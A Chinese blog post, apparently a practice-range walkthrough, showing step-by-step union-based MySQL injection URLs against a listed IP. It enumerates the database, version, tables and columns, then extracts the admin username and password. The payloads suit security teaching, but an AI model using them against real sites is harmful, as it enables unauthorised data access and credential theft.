SQL注入 mysql4.0版本_SQL注入(上)

最新推荐文章于 2023-01-08 23:53:49 发布
最新推荐文章于 2023-01-08 23:53:49 发布
阅读量384 收藏
点赞数
文章标签: SQL注入 mysql4.0版本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31884143/article/details/114000546
版权

查相关内容(一定要在回显点处查看!)

查数据库名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()

3fd6fadd822f4ab547a97ebf0db032df.png

查数据库版本(mysql>5.0,5.0 以后的版本才有information_schema, information_schema存储着数据库名、表名、列的数据类型、访问权限等)

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()

28ab5f1fd1b5a98a49dc869b2b248a8e.png

查表名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

3f56792b362f0d25f0e6c51721e32f23.png

查字段名

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

a06036d4cf78cbb144b6aeb39c20eda3.png

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1

f73ded191f80c9531f7ec9f450b391a4.png

http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1

09bdeb0706eaa5fff9d764050b54796e.png

查出 admin 表里 有 id username password 三个字段

查询字段内容

构造

?id=1 and 1=2 union select 1,username from admin limit 0,1

6781429c310062f7b9d225d1f3cd3502.png

构造

?id=1 and 1=2 union select 1,password from admin limit 1,1

2514c147307387ed1658d509082ccfb5.png

limit 1,1 没有回显,说明只有一个用户

构造

?id=1 and 1=2 union select 1,password from admin limit 0,1

2f9b592d9aeb3435803f67a569eba1a5.png

如此,得到了管理员账号和密码

魔力奥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQLSQL注入
mojiezhao的博客
02-18 338
如果通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)SQL命令入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据...
SQL注入之Mssql注入
qq_57307348的博客
02-16 5437
sql注入之mssql注入基础
mysql 4.0手工入_手工入——MySQL手工入实战和分析
weixin_39861920的博客
01-27 182
前言今天进行了MySQL手工入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。判断入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在入点。如下图。判断字段数通过 order by 语句,如果后面输入的数字大于数据...
SQL注入Mysql
qq_27862405的博客
05-24 954
必要知识点: 在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。 数据库中符号“.”代表下一级,如adb.user表示adb数据库下的user表名 Information_schema.tables:记录所有表名信息的表 Information_schema.columns:记录所有列名信息的表 Information_schema.sch
mysql4.0安装_redhat9下安装mysql-4.0.26记
weixin_42355865的博客
02-07 115
-- 操作数据库mysql -u root -pEnter password: 这里输入密码mysql> show databases; ---显示数据库名, 开始有mysql和testmysql> use mysql; ---进入mysql数据库mysql> show tables; ---显示表名mysql> describe user; -...
mysql 4.0.27 下载_CentOS编译Mysql 4.0.27数据库问题解决
weixin_30284477的博客
01-27 257
CentOS编译Mysql 4.0.27数据库问题解决来源:互联网宽屏版评论2008-06-01 03:28:00现在好多人都用起了centos5,但有些特殊要求还必须安装mysql4.0.27的数据库,在第一次安装过程中还遇到了不少问题,特把这次安装过程记录下来以供遇到类似问题的朋友参考首先下载mysql4.0.27.tar.gz,解压进入目录编译编译时出现错误:checking “Li...
mysql结构(ctfhub-sql注入
qq_26245471的博客
01-08 440
ctfhub sql注入mysql结构
10-sql注入-mysql入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序...综上所述,了解SQL注入的原理和方法对于保护Web应用程序免受攻击至关重要。开发者应当采取适当的防御措施,并时刻关最新的安全威胁动态,以确保系统的安全性。
MySql.Data.dll(.NET4.0版本
01-06
7. **预编译SQL语句(PreparedStatement)**:为了提高性能和安全性,MySQL.Data.dll支持预编译的SQL语句,避免SQL注入攻击。 8. **数据库元数据访问**:提供获取数据库、表、视图和索引等信息的能力。 9. **异步...
mysql版本_spring4.0.rar
02-08
Spring4.0版本是该框架的一个重要里程碑,它引入了许多改进和新特性,包括对Java 8的全面支持、更好的类型安全的基于解的配置、对反应式编程的支持以及对JMX的改进等。Spring框架的核心组件包括依赖入(DI)、...
MYSQL入中load_file()函数的进一步应用
07-24
MYSQL入中load_file()函数的进一步应用
mysql4.0和5.0驱动
10-09
mysql4.0和5.0驱动。在用pb做不同数据库的导入时不用版本mysql所对应的驱动包
MySQL-NET4.0&4.5&4.5.2-DLL.zip
06-13
MySQL-NET4.0&4.5&4.5.2-DLL.zip 类库文件,用于连接MySQL。20190613
MySQL-server-4.0.20-0.i386.rpm
02-02
linux下MySQL-server-4.0.20-0.i386.rpm
mysql -4.0.26安装包
11-09
mysql 4.0.26安装包,本人使用过,5.0之前的版本,对于早期项目来说用的上,稀缺资源。
MySql.Data_4.0.zip
01-25
5. **参数化查询**: 防止SQL注入攻击,支持使用参数化查询或存储过程,提高代码的可读性和安全性。 6. **异步操作**: 版本4.0可能包含异步API,允许开发者在执行数据库操作时避免阻塞UI线程,提升用户体验。 7. **...
sqldd:一款碾压sqlmap的sql注入漏洞检测系统^^
05-31
Sqli-lib是一款由PHP语言编写SQL注入漏洞闯关游戏,包含了六十几个可入页面,涵盖了几乎所有类型SQL注入漏洞,同时不同的关卡自定义了不同的过滤规则,是SQL注入漏洞学习的首选靶场。图4-1 本地搭建Sqli-lib环境...
win2003 +mysql-4.0.2+ Tomcat 5.0的配置
Border's log
03-01 1650
win2003 +mysql-4.0.2+ Tomcat 5.0的配置具体实现步骤:一、软件准备: 我的是一台能正常运行win2003 的硬软软件环境。1. j2sdk1.4.2_06         2. mysql-4.0.23-win.zip3. Tomcat 5.0           http://www.apache.org/4. mm.mysql-2.0.4-bin.jar:  到h
SQL注入 sql_delete_syntax
最新发布
07-09
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而可以执行未经授权的操作或者获取敏感信息。 在谈论SQL注入时,"sql_delete_syntax"可能指的是SQL语句中的DELETE语法。DELETE语句用于从数据库中删除记录。 以下是一些常见的SQL删除语句的语法示例: 1. 删除整个表中的所有记录: DELETE FROM 表名; 2. 删除满足特定条件的记录: DELETE FROM 表名 WHERE 条件; 3. 删除具有特定主键值的记录: DELETE FROM 表名 WHERE 主键列 = 值; 请意,这只是SQL删除语句的基本语法示例,并不代表完整的语法。在实际使用时,你需要根据数据库类型和表结构进行相应的调整。 对于防止SQL注入攻击,请使用参数化查询或预编译语句,并避免直接将用户输入拼接到SQL语句中。这样可以有效地防止恶意代码被插入到SQL语句中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值